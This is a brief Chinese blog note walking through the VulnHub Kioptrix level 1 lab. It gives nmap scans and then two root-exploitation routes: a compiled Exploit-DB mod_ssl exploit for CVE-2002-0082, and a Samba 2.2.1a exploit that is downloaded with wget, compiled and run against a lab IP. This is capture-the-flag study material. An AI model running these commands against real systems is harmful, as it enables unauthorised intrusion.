vulnhub-Kioptrix_level_1笔记

发布于 2022-03-07  1390 次阅读


  1. nmap -sP 192.168.21.133/24      #主机发现
  2. nmap -sC -sV -A -p 1-65535 -f -T4 192.168.21.136   #22/80/111/139/443/1024,服务探测
    1. exp获权
      https://www.exploit-db.com/search?cve=2002-0082第一个下载
      gcc -o exp 47080.c -lcrypto    编译
      ./exp
      ./exp | grep apache-1.3.20
      ./exp 0x6b 192.168.21.136 -c 40
      whoami(root成功,不成功就是apache权限)
    2. msf获权
      search smb_ver
      use 0
      show options
      set threads 30
      set rhosts 192.168.21.136
      run    #探测获得Samba2.2.1a
      wget -O t.c https://www.exploit-db.com/download/10
      gcc -o tt t.c
      ./tt -b 0 192.168.21.136
子夜不哭
最后更新于 2022-03-07